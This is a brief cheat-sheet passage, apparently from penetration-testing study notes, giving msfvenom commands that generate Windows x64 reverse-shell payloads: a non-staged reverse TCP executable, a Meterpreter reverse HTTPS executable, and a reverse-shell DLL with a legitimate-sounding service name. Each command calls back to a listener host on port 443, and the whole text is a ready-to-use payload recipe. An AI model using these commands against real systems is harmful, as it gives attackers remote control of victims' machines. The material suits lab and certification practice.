3. MSFVenom
Search for payload:
msfvenom -l payloads --platform windows --arch x64
Non-staged 64-bit Windows Reverse TCP Payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe
Non-staged 64-bit Windows Reverse HTTPS Payload:
sudo msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.199 LPORT=443 -f exe -o met.exe
64-bit DLL Payload:
sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.226 LPORT=443 -a x64 --platform Windows -f dll -o EnterpriseServiceOptional.dll